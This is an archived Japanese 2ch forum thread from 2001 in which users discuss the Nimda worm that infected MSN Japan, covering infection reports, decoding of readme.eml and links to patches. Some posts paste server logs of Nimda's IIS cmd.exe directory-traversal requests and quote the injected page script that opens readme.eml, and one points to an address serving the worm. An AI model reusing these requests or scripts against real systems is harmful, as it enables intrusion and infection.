2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

MSNでウイルス感染!?

1 :名無しさん@お腹いっぱい。:01/09/19 00:11
ニュー速板では、あきらかにウイルスだと言う人も
出てますが、どうなんでしょう?

関連スレ
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776

2 :名無しさん@お腹いっぱい。:01/09/19 00:13
http://www.msn.co.jp
を開くとreadme.exeというファイルがDLするようになってるそうです。

3 :名無しさん@お腹いっぱい。:01/09/19 00:21
MSNがやられましたw
topを読むと送られてきます。
http://www.msn.co.jp/readme.eml

4 :名無しさん@お腹いっぱい。:01/09/19 00:22
おいおい、古い穴狙ってるな

5 :名無しさん@お腹いっぱい。:01/09/19 00:30
emlから直接Base64の部分抜き出してデコードしてみたけど、
なんでこのファイル、こんなアイコンなんだ。

つーか普通にレスしちゃったけど、>>3のリンクはIEにパッチ
当ててない奴はまずいだろ。

6 :名無しさん@お腹いっぱい。:01/09/19 00:31
>>5
あ、ごめん。ネスケなので気が付かなかったー。

7 :名無しさん@お腹いっぱい。:01/09/19 00:32
http://www.mv-tohoku.co.jp/
http://www.prland.co.jp/

ここも同じ現象らしいよ。

8 :名無しさん@お腹いっぱい。:01/09/19 00:34
ついでにバイナリエディタで覗いて見たけど、こいつも
Admin.dllとか言ってるな。最近はさすがにCodeRedスレ
見てなかったから知らんけど、そこらへんの新種が関係
してんのかね

9 :名無しさん@お腹いっぱい。:01/09/19 00:35
MIMEのデコードが上手くいかない(;´Д`)
readme.exeのみのヘッダ教えてチョ

10 :名無しさん@お腹いっぱい。:01/09/19 00:36
ということで、CodeRedスレの人間に聞いた方が早そうだな。寝よ

11 :名無しさん@お腹いっぱい。:01/09/19 00:36
http://210.150.177.216/
ここもな。

12 :名無しさん@お腹いっぱい。:01/09/19 00:38
>>9
ん?readme.exeのみのヘッダ?

13 :名無しさん@お腹いっぱい。:01/09/19 00:39
>>9
base64デコーダを使え。

14 :名無しさん@お腹いっぱい。:01/09/19 00:39
>>2,7
IIS使う馬鹿に何が提案できるんだ

15 :9:01/09/19 00:41
>>12-13
RarUty使ってるのだが、base64として認識してくれない(;´Д`)

16 :名無しさん@お腹いっぱい。:01/09/19 00:41
寝ようと思ったけどまだ1時にもなってないのか。
見直してみたけど、やっぱりtftpとかも書いてあるわ。

17 :名無しさん@お腹いっぱい。:01/09/19 00:41
128 名前:  投稿日:01/09/19 00:40 ID:KLLLh/gg
突然*.emlファイルが数千作成され、エクスプローラー開くと空き要領が5MB/secくらいの
スピードで減っていった。LANでつないでいるリブレットも同時進行(^^;

18 :名無しさん@お腹いっぱい。:01/09/19 00:43
>>17
実行したんかい(w

それにしても、「不正なMIMEヘッダを含む〜」とCodeRedの
合作かな。なんか面白みないね

19 :名無しさん@お腹いっぱい。:01/09/19 00:45
ワシもバイナリ観察ちゅう。いろいろ手が込んでますな。
しかし>>17のように実行は出来ないw

20 :名無しさん@お腹いっぱい。:01/09/19 00:47
新種ウイルスという話になってる<ニュース速報

21 :名無しさん@お腹いっぱい。:01/09/19 00:47
やっぱ、ここで、話題になってましたか・・・・

実は、実行しちゃいました><

readme.exeですが、
concept virs (CV) v5
って文字列が含まれてます。(TT)

concept virsをちょっと、調べてみたのですが、
英語版wordに感染するマクロウィルスらしいです。

22 :名無しさん@お腹いっぱい。:01/09/19 00:48
ああ、VMwareのバーチャルマシン上で実行しようとしたら、
何日か前に消しちまったんだった。残念。まあ挙動はバイナリ
みるだけでほとんど書いてあるような気もするが。

23 :21:01/09/19 00:49
21です。

ニュース速報って、どこの、ニュース速報?>20

24 :名無しさん@お腹いっぱい。:01/09/19 00:50
>>23
あ、ややこしい書き方でスマソ、ココ(2ch)です。

25 : :01/09/19 00:50
対策されたみたいです、もう開きません

26 :名無しさん@お腹いっぱい。:01/09/19 00:52
ん?ちと待てよ。これって今度は無差別にこのemlを
送信するわけか?だとしたらトラフィックがまた・・・。
一個76.6KBのファイルをガンガン送られたらかなわんな

27 :名無しさん@お腹いっぱい。:01/09/19 00:53
>>17
その128、俺。

28 :名無しさん@お腹いっぱい。:01/09/19 00:54
>>27
ネットワークの方はどうなってる?パケット送りまくり?

29 :名無しさん@お腹いっぱい。:01/09/19 00:55
>>28
Librettoとラブコールしまくりだった。

30 :名無しさん@お腹いっぱい。:01/09/19 00:57
該当バグ。IE5.5と5.01だけらしいです。それ以前以後のIEやネスケには無関係(らしい)
http://www.microsoft.com/JAPAN/support/kb/articles/JP290/1/08.htm

ん?するとバックドアで入ってweb閲覧者にも送りつけて繁殖?
IE5.01〜5.5限定とはいえ被害が広がるねえ。

31 :名無しさん@お腹いっぱい。:01/09/19 00:57
>>29
そうか、じゃあ後は自分で解析するのも面倒っつーか
意味ないからCodeRedスレのログでも読むかな。

32 :名無しさん@お腹いっぱい。:01/09/19 00:58
速報板のスレ。
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50&nofirst=true

33 :名無しさん@お腹いっぱい。:01/09/19 01:05
過去ログ読んできたけどまだそれほど情報でてないな。
1のスレも読んでみたけど、メディアプレイヤーが立ち上がる?
「不正なMIMEヘッダ〜」に加えて、「MediaPlayerのスキンファイル〜」
の穴も突こうとしてんのかね。出遅れたからわからん。
CodeRedスレの人間教えれ

34 :名無しさん@お腹いっぱい。:01/09/19 01:06
http://www.trusecure.com/html/tspub/hypeorhot/rxalerts/tsa01024_cid177.shtml
かなぁ。

35 : :01/09/19 01:07
詳細はここで。
http://memo.st.ryukoku.ac.jp/archive/200109.month/thread.html

36 : :01/09/19 01:07
nimda?

37 :名無しさん@お腹いっぱい。:01/09/19 01:10
今日は夜から、なんかネットが重いなって思ってたけど、
こいつがでかいファイルを撒き散らしてたわけね

38 :名無しさん@お腹いっぱい。:01/09/19 01:13
>>35
サンクス、ざっと読んできた。また祭りか?とか思ってたけど、
洒落にならん・・・16種類。しかも良く考えたら「不正なMIME〜」は
IEだけじゃなく、OutLookもか・・・

39 :名無しさん@お腹いっぱい。:01/09/19 01:13
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
って書いてあるよ?

40 :名無しさん@お腹いっぱい。:01/09/19 01:15
でかいって言っても高々79261バイトじゃないのw

41 :名無しさん@お腹いっぱい。:01/09/19 01:18
>>40
無差別に撒き散らすとしたら十分すぎるほどでかい

42 : :01/09/19 01:19
>>40
認識甘すぎ・・・・

43 :40:01/09/19 01:20
すまん。鬱だ寝よう。

44 :名無しさん@お腹いっぱい。:01/09/19 01:22
>>43
まぁまぁ、ドンマイドンマイ

それにしても、こんどのコードネームは Nimda か

45 :名無しさん@お腹いっぱい。:01/09/19 01:26
つーかドンマイ言ってる場合じゃなかった。またも
ARP Floodが〜。1分にARPだけで1025パケット・・・

46 :名無しさん@お腹いっぱい。:01/09/19 01:27
readme.exeを実行して、ブルーなので寝ます。
はぁ〜

47 :名無しさん@お腹いっぱい。:01/09/19 01:33
実行したらexplorer.exeが落ちてワトソン博士が反応した
メモリリフレッシュするには便利なアイテムだよ

48 :名無しさん@お腹いっぱい。:01/09/19 01:38
ワラタ

しかし笑い事じゃない。どうでもいいけどこのreadme.exe、
リソース覗いてみたらアイコンが5つ。・・・意味ないぞ

とりあえず今回もJ-COM内からのアタックがガンガン来てる
上にARPの数はさらに増えつつある。とりあえずJ-COMに
メール出しとくか。

49 :名無しさん@お腹いっぱい。:01/09/19 02:12
 

50 :名無しさん@お腹いっぱい。:01/09/19 04:43
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
結局、脆弱性”Unicode Web Traversal”のパッチは無し?
ってことは、IIS全部感染対象?

URLScanしか方法無いのかなぁ。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20010914/1/

51 :名無しさん@お腹○っぱい:01/09/19 04:52
しゃれにならんねえ





ワショ-イ

52 :名無しさん@お腹いっぱい。:01/09/19 06:02
ぱっち。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078

53 :名無しさん@お腹いっぱい。:01/09/19 06:07
ワケ ワカ ラン

54 :名無しさん@お腹いっぱい。:01/09/19 06:54
まだ読んでないけど、
Scary Hybrid Internet Worm Loose
http://wired.com/news/technology/0,1282,46944,00.html

55 :名無しさん@お腹いっぱい。:01/09/19 06:57
>>54
Nimdaは、先週起こったテロとは関係ないっちゅーことやろ

56 :名無しさん@お腹いっぱい。:01/09/19 07:11
感染サイト(^^;
http://search.fresheye.com/?kw=readme.eml&term=monthly
今日の昼頃には感染サイトが爆発するでしょう。

57 :名無しさん@お腹いっぱい。:01/09/19 07:24
シマンテックの解析が進んでるねぇ。凄い凄い。
がんばれしまんてくー。

58 :名無しさん@お腹いっぱい。:01/09/19 07:28
これってさぁ、「ウチはApache for Winだから関係ないもーん」とか
思ってても、メールから感染したら、やっぱwebページが改竄されるのかなぁ。

59 :名無しさん@お腹いっぱい。:01/09/19 07:39
>>58
感染したPC側はサーバーへのアタックもやるのかな。
それによると思う。
同じウィルスの感染手段が異なるだけのものだとすれば、
Webも改竄されるのでは。

60 :ヤバイんじゃないの、、:01/09/19 08:23
このワーム絶対ヤバイよ、、。どうも>>59っぽいし。

そういえば
http://www.msn.co.jp/
ふっかつしないね、、、。

61 :名無し:01/09/19 08:36
複数の感染方法を持ってるのかよ。

62 :名無しさん@お腹いっぱい。:01/09/19 09:12
http://www.mv-tohoku.co.jp/
http://www.prland.co.jp/

このサイトをクリックしたらPCがバリバリバリバリいうようになっちゃったよぉ〜。
もう30以上もつづいているよ。。。
ファイルのダウンロード画面が一瞬出たんだけど、
保存するってやらなくても落ちて来ちゃうの?
対処法はどうすればいいの?

ぁぁぁぁぁああああパニックだよぉぉぉぉぉおおおおお!

63 :62:01/09/19 09:18
Windowsファイル保護っていう画面が出て
Windowsを正しく動作するための必要なファイルが認識できない
バージョンのファイルに置き換えられています。システムの
安定を維持するために、これらのファイルを元のバージョンに
復元する必要があります。

Wndows2000 Professional CD-ROMを挿入してください。

ってなるんだけど、ただCDを入れれば勝手に処理してくれるのんですか?

64 :62:01/09/19 09:20
Un Installなんとか
Map....

っていうお知らせ画面がでてきました。

65 :ななし:01/09/19 09:22
駆除方法が確立されるまで、手出さないほうがいいんじゃない?

66 :名無しさん@お腹いっぱい。:01/09/19 09:22
あー、あんなの見てなくてよかった。
オレ、msnなんて昔から見たことないから・・・・・
あの錆、めちゃ遅いからね。

いまだに、立ち上げと同時にmsnが表示されたままの人が
多いようだし・・・・

67 :名無しさん@お腹いっぱい。:01/09/19 09:24
>>63
いやいや。
しばらくすると、各社から修復方法が発表になると思うので、
それまでは、予備のPCでやっていた方がいいと思う。

68 :62:01/09/19 09:24
静かです、、すごく静かになりました。。。。
なんだかPCの中にとんでもない悪者が潜んでいそうでとてもコワイです。

69 :名無しさん@お腹いっぱい。:01/09/19 09:27
このemlファイル使った穴を塞ぐパッチって、IE5.5SP2には
含まれてるよね?

70 :名無し:01/09/19 09:35
IPアタック来てますか?

71 :アル厨房:01/09/19 09:38
まだ駆除方法は出てないわけだ?
ひっかっかっちゃったよヽ(´ー`)ノ 実害出てないけどね。。
そのうちファイルあぼられたりするのかなあ?

72 :名無しさん@お腹いっぱい。:01/09/19 09:38
>>70
昨日だけで34回きた

73 :アル厨房:01/09/19 09:39
そうそう、各フォルダに009.emlとかいうファイルがいっぱいできてた。
デスクトプンだけじゃなかったみたい(´Д`)

74 :アル厨房:01/09/19 09:40
どんな解説見てる?

75 :アル厨房:01/09/19 09:42
これってアメリカの報復ハカーと関係あるのかなぁ?

76 :アル厨房:01/09/19 09:43
ラウンジにサイト貼られてたから開けちゃったよヽ(;´ー`)ノ
ファイルのバックアップとっといた方がいいかな?     

77 :みみずん:01/09/19 09:46
うちやられちゃったよ・・・。
http://mimizun.mine.nu/

ハードディスクいっぱいにしてくれました。一応、*.emlと*.tmp.exeを削除しました。
でもなぁNTsp6aのIISでSRPあてていたんだが・・・

78 :アル厨房:01/09/19 09:54
もしかしたらファイル消されたかもしれない。C:\のファイルが。。
気のせいかもしれないけどね。あと.eml消せなくなってるよ??
>>77
ご愁傷様。。なんか実害あった?ファイル消されたりするのかなぁ?
意味ないんじゃないの??

79 :まじーにょ:01/09/19 10:02
ゴルァ、おれのサーバにアホみたいにきてるぞ。
CodeRedIIの比じゃないぐらいの割合で。

80 :名無しさん@お腹いっぱい。:01/09/19 10:02
>69
 このemlファイル使った穴を塞ぐパッチって、IE5.5SP2には
 含まれてるよね
IE6,0はどうなんでしょうか?

81 :名無しさん@お腹いっぱい。:01/09/19 10:06
新種ウイルス「Nimda」の感染拡大=米司法長官
http://headlines.yahoo.co.jp/hl?a=20010919-00000116-jij-bus_all

 【シリコンバレー18日時事】「Nimda(ニムダ)」と呼ばれる危険度の高い新種の
コンピューターウイルスが登場し、ウイルス対策会社などが注意を呼び掛けている。

 米ウイルス対策大手シマンテックによると、同ウイルスは、電子メールで届けられる添付
ファイル「readme.exe」に潜み、これを利用者が不用意に開くことで感染する。
感染したコンピューターは、ウイルスメールを外部に発信。マイクロソフト製ウェブサーバー
ソフトを利用している他のコンピューターに対して同ソフトのセキュリティーホール
(欠陥)を狙った攻撃を仕掛ける。 (時事通信)[9月19日9時3分更新]

82 :名無しさん@お腹いっぱい。:01/09/19 10:08
>>80
確かめてみたら5.5SP2にはばっちり含まれてた。
悪いんだが6.0はわからん。でも対策されてない気がする

83 :名無しさん@お腹いっぱい。:01/09/19 10:08
http://help.msn.co.jp/notice.htm

84 :名無しさん@お腹いっぱい。:01/09/19 10:11
このスレで言ってるのって
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-075
のことだよね。

これとCodeBlueって関係してんの?
ウチも昨日からアタック受けてるけどあれとMSNのは別物じゃないかな。

85 :名無しさん@お腹いっぱい。:01/09/19 10:12
>マイクロソフト製ウェブサーバーソフトを利用している他の
^^^^^^^^^^^^^^^^
>コンピューターに対して同ソフトのセキュリティーホール

>(欠陥)を狙った攻撃を仕掛ける。(時事通信)[9月19日9時3分更新]
^^^^^^^^^

これって、損害賠償責任ないの?

86 :名無しさん@お腹いっぱい。:01/09/19 10:16
210.91.45.224 - - [19/Sep/2001:10:03:44 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 233
210.91.45.224 - - [19/Sep/2001:10:03:50 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:03:57 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:05 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:10 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:16 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:23 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:30 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 400 205
210.91.45.224 - - [19/Sep/2001:10:04:38 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:10:20 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 233
HRS-MSG - - [19/Sep/2001:10:10:22 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:37 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:41 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:44 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:48 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:51 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:54 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:10:58 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:11:01 +0900] "GET /sc?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:03 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:11:06 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:11:09 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:11 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:14 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:20 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 214

永遠に続く。重いわけだ。

87 :名無しさん@お腹いっぱい。:01/09/19 10:18
米軍がやっとんとちゃうか?

88 :名無しさん@お腹いっぱい。:01/09/19 10:23
感染したが、GoBackで昨日の午前中に戻したからたぶん大丈夫だろう。

89 :名無し:01/09/19 10:24
PCとサーバの両方を狙う新種ワーム
http://www.zdnet.co.jp/news/0109/19/b_0918_01.html

90 :80:01/09/19 10:25
>>82
ありがとうございます。
6.0から5.5にバージョンアップ?と思いつつIEのページからDLしようとしたら
最新バージョンがインストール済みでバージョンアップできませんですって。
こわいよー!

91 :名無しさん@お腹いっぱい。:01/09/19 10:26
えっと。感染したのでいろいろ見てみたけど

ありとあらゆる実行ファイルにreadme.emlなる文字列が確認されたのでめんどいのでクリーンインストールします。。。
パッチあてめんどいんだよなぁ。

92 :91のみみずん:01/09/19 10:27
えっと、>>91はIISのサーバーの場合です。普通に見ているだけでは問題ありません。

93 :名無しさん@お腹いっぱい。:01/09/19 10:32
>>91
GoBack入れとけば良かったのにな。
うちはGoBackで感染ファイルが根こそぎなくなったわ。よかったよかった。

94 :名無し:01/09/19 10:33
おいおい、ニュース速報板に書き込むとアタックが来る。

95 :名無しさん@お腹いっぱい。:01/09/19 10:36
>>90
6から5.5へは逝けません。6へは一方通行です。

96 :名無しさん@お腹いっぱい。:01/09/19 10:36
MSN復活しとるな。。。
お詫びも警告もないな。。。

やっぱりな。。。。

97 :名無しさん@お腹いっぱい。:01/09/19 10:37
http://headlines.yahoo.co.jp/hl?a=20010919-00000001-vgb-sci
複合的な攻撃、感染機能をもつウィルス Nimda

Nimda=ニダ?

なんて読むニダ

98 :名無しさん@お腹いっぱい。:01/09/19 10:39
>>94 >>96
米軍の作戦の1つニダ

99 :名無しさん@お腹いっぱい。:01/09/19 10:43
汚染源リスト
http://headlines.yahoo.co.jp/hl?a=20010919-00000002-vgb-sci

100 :名無しさん@お腹いっぱい。:01/09/19 10:43
Lynxでiモードの方のページ見てたから気付かなかったけど、
ここのトップにNimdaの警告が貼ってあるね。気が利くな。
ちなみに「見ただけで感染」を防ぐだけじゃなく、パッチ当てた
ならメール経由でも防げるはず。まあまだメールで来た人はいない
みたいだけど。

101 :名無しさん@お腹いっぱい。:01/09/19 10:45
>>94
あそこは、アクセスするだけでロクを取られているし、
そのログをハッキングしているやつがいるから要注意。

102 :名無し:01/09/19 10:45
ニュース速報板に誰か書き込んでみた?
アタック来るよね?俺だけ?

103 :名無しさん@お腹いっぱい。:01/09/19 10:46
どれ、試しに書きこんでみるか。黒氷でもアタック見える?

104 :名無しさん@お腹いっぱい。:01/09/19 10:49
>>102
そうだよ。
あそこ、絶対にログが漏れているよ。

105 :名無しさん@お腹いっぱい。:01/09/19 10:50
>>102
IPさらせ。

106 :62:01/09/19 10:51
emlファイルってどうやって消せばいいの?
2300個もあったよ。。。
右クリックで消そうとすると

ファイルを削除できません。送り側のファイルまたはディスクから読みとれません。

っていわれるし。
消せるファイルは削除するとなんか実行されてるみたいだし。。。

マジで恐いよ!!

107 :名無し:01/09/19 10:51
The firewall has blocked Internet access to your computer (TCP Port 8081) from ton.2ch.net (64.71.133.114) (TCP Port 4103) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 9081) from ton.2ch.net (64.71.133.114) (TCP Port 4105) [TCP Flags: S].

とうとう、ここもだよ。

108 :アル厨房:01/09/19 10:54
おいおい、早くワクチン作ってくれぇヽ(;´Д`)ノ 

109 :名無しさん@お腹いっぱい。:01/09/19 10:57
>>106
dosで消せ。

110 :みみずん:01/09/19 10:58
>>106
うちはけせたけど。。。NT ServerSP6a+SRP

111 :62:01/09/19 11:00
f: del *.eml

でいいですか?

112 :名無しさん@お腹いっぱい。:01/09/19 11:01
これみて。
http://www.ipa.go.jp/security/index.html

日本のお役所は、なーんも警告出してねーよ。
税金泥棒だな。

113 :名無しさん@お腹いっぱい。:01/09/19 11:05
>>106
ファイルの検索で期間を指定して当格ファイルを選び出して削除。

114 :62:01/09/19 11:05
DEL F:*.eml

115 :62:01/09/19 11:06
ファイルの検索でひっかかったemlファイルを右クリックで
削除しようとすると警告ばってんがつくんですよ。。。

116 :名無しさん@お腹いっぱい。:01/09/19 11:08
>>114
それだと友達から来て保存しているメールも削除されちゃうかもよ。

117 :62:01/09/19 11:09
見つけたemlファイルを軽く一回クリックしただけでも
ファイルのダウンロードが始まるんですね。。。。
どうしよう。。。

118 : :01/09/19 11:34
http://210.135.182.178/
ここいくとreadme.exeが落とせる

119 :名無しさん@お腹いっぱい。:01/09/19 11:39
>>117
パソコン買い換える。

120 : :01/09/19 11:42
emlファイルってどうやって検索するんですか?
HDD感染したっぽいんですけど

121 :名無しさん@お腹いっぱい。:01/09/19 11:50
誰かNimda専用スレ立ててくださいませ。こいつは酷い。
Apacheのログが2分間隔くらいで
GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0
みたいなのばっかり、ログ見た時ぞっとしたよ。

122 :  :01/09/19 11:53
cmd.exe ってウイルスですか?>121

123 : :01/09/19 11:58
<html><body bgcolor=black><br><br><br><br><br><br>
<table width=100%><td><p align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p align="center">
<font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html>

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

124 :名無しさん@お腹いっぱい。:01/09/19 12:00
>>122 コマンドプロンプトです。ファイ名を指定して実行で試してみれば
わかりますが。

125 :124:01/09/19 12:00
ファイ名X ファイル名。鬱。

126 :ななしん:01/09/19 12:10
ところで、こいつってIEコンポーネントブラウザ(cuamとか)ってどーなんだろ?

127 :名無しさん@お腹いっぱい。:01/09/19 12:14
パッチ当ててなければ食らうだろうね。
メーラーも、IEコンポーネント使ってるやつなら危険

128 :ななしさん:01/09/19 12:27
ニダスレぎぼーん
情報がなくって困ってます。
いまIISをスキャンしているのは、いけないページを見てしまった
クライアントという事でいいですか?
アパッチのhttpドキュメントをSAMBAで共有してたら、やられちゃうん
でしょうか?defaunt.htmlだけが対象ならいいんだけど、index.htmlも
書き換えられるんだったら、自宅のもやばい・・・嫁のPCはSPなんて
あててないもん

129 :名無しさん@お腹いっぱい。:01/09/19 12:40
>>128 感染ルートは1つじゃないです。
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html

130 :名無しさん@お腹いっぱい。:01/09/19 12:45
IE5.00ってやばいすか?
SP2って書いてあるんすけど

131 :名無しさん@お腹いっぱい。:01/09/19 12:51
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301
ここでやろうぜ

132 :名無しさん@お腹いっぱい。:01/09/19 13:41
お粗末msn さらしあげ。

133 :こんな感じ:01/09/19 15:45
2001/09/18(23:15:46) W-SV 211.125.194.55 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0"
2001/09/18(23:15:49) W-SV 211.170.249.153 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:15:54) W-SV 211.170.249.153 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:15:57) W-SV 211.125.194.55 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:15:58) W-SV 211.125.194.55 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:00) W-SV 211.170.249.153 [80] 404 264 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:00) W-SV 211.125.194.55 [80] 404 264 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:03) W-SV 211.103.80.185 [80] 404 263 "GET /scripts/..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:05) W-SV 211.170.249.153 [80] 404 281 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:13) W-SV 211.103.80.185 [80] 404 263 "GET /scripts/..タ/../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:14) W-SV 211.170.249.153 [80] 404 281 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

昨晩から、ずっと・・・・・・・・・

134 :MSN広報部:01/09/19 19:33
http://help.msn.co.jp/notice.htm
ご質問とご回答
Q.自分の会社のサーバーが被害にあった。MSN からの攻撃が原因ではないか。

A. MSN ではサーバーが直接マイクロソフト社外のサーバーに対して影響を及ぼしたことはないと考えています。
MSN のインターネット上に開いたサーバーは、サーバー機能ではなくそのコンテンツファイルが 9/18 の夜 11 時以降
1 時間ほど感染した状態にありましたが、これにより影響を受けたのは直接このサーバーにアクセスした利用者の
コンピュータになります。なお、利用者のコンピュータが感染するには、ブラウザのバージョンなどいくつかの条件が
そろった場合に限られます。

135 :名無しさん@お腹いっぱい。:01/09/19 19:35
普段寛容な俺もMSNのこのコメントには殺意を覚えた。
とくに「〜ないと考えています。」ってところ。

136 :三遊亭・з・)) ◆dABRuhdE :01/09/19 19:36
>>90
「不適切な MIME ヘッダーが原因で Internet Explorer が電子メールの添付ファイルを実行する」(本日更新)
 http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020

> 注 : ご使用の Internet Explorer を Internet Explorer 5.5 Service Pack 2 (SP2)、
> Internet Explorer 5.01 Service Pack 2 (SP2) または Internet Explorer 6 に
> アップグレードすることによっても、この問題を修正することができます。

だってさ ヽ(´ー`)ノ

137 : :01/09/19 19:39
ってーか、パッチ配布してる大元が、、、何でその穴使ったウイルスに
感染するかね。。。my糞。

138 :名無しさん@お腹いっぱい。:01/09/20 00:10
やっぱ。カネの亡者の会社だけあるな。

139 :名無しさん@お腹いっぱい。:01/09/20 09:21
どうしてみんなは
「Windowsが欠陥品である」
と言うことに気がつかない?

見ただけで勝手に何かを実行するなんて言う構造は
根本的に間違い。

こんな基地外であるMicro$oftは、早く潰れて下さい。
1番悪いのは、ビルゲイツです。
商売以外にももうちょっと頭使って下さい(藁

で2番目にに悪いのが、ウィルス作成者。
いくらWindowsがショボイと言っても、
そんなことやってはいけません。

3番目に悪いのは、それに気がつかずM$製品を使う
厨房ユーザー

感染したmsnは、もちろん消防(ププププ

140 :さわだけんじ:01/09/20 09:56
>>139
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように


141 :名無しさん@お腹いっぱい。:01/09/20 09:58
コピペ厨ウザイ

142 :名無しさん@お腹いっぱい。:01/09/20 10:01
>>139
自分で工夫したり探求する能力がないんだよ、
「周りが使っているから」と言うだけでそれ以上の
判断止めちゃう奴が多いからね。
大丈夫、たとえ欠陥有っても気がつかないから。

要するにMSの問題じゃなくてユーザーの問題。
便利な部分だけ受け取って面倒な部分は他人任
せにしたり目を背け続けた結果だよ。こういう
人たちはどんなOS使っても同じね。

143 :名無しさん@お腹いっぱい。:01/09/20 10:17
>>142
周りが使ってるからというより、あらゆるソフトが手に入りやすいから
ってのが主な理由でしょ。

144 :名無しさん@お腹いっぱい。:01/09/20 10:21
始めっから入ってるからだろう,ソフトがどうかなんて考えて
無い奴が多いと思うが

145 : :01/09/20 10:35
すぐに穴空いたり、変なスクリプトやウイルス出てきて
飽きないよ。WIN。
パッチ当てて安心するだけじゃなく、そのバグ突いた不
正スクリプト探し当てるのも楽しいし。
ただ、そのバグ発見した本人が公開前にMSに警告したに
も関わらず、パッチ出なくて業を煮やして公開に踏み切
ってるのは企業態度として頂けない。

146 :名無しさん@お腹いっぱい。:01/09/20 10:35
>>142
excel と word を使ってるだけだろ,ほとんどの奴は

147 :名無しさん@お腹いっぱい。:01/09/20 10:37
いままでにIEから重要なエラーとか言うので、その事を管理側に教えた事ある人います?
これでこのエラーでたの2度目なんだけど、送信しなかった。
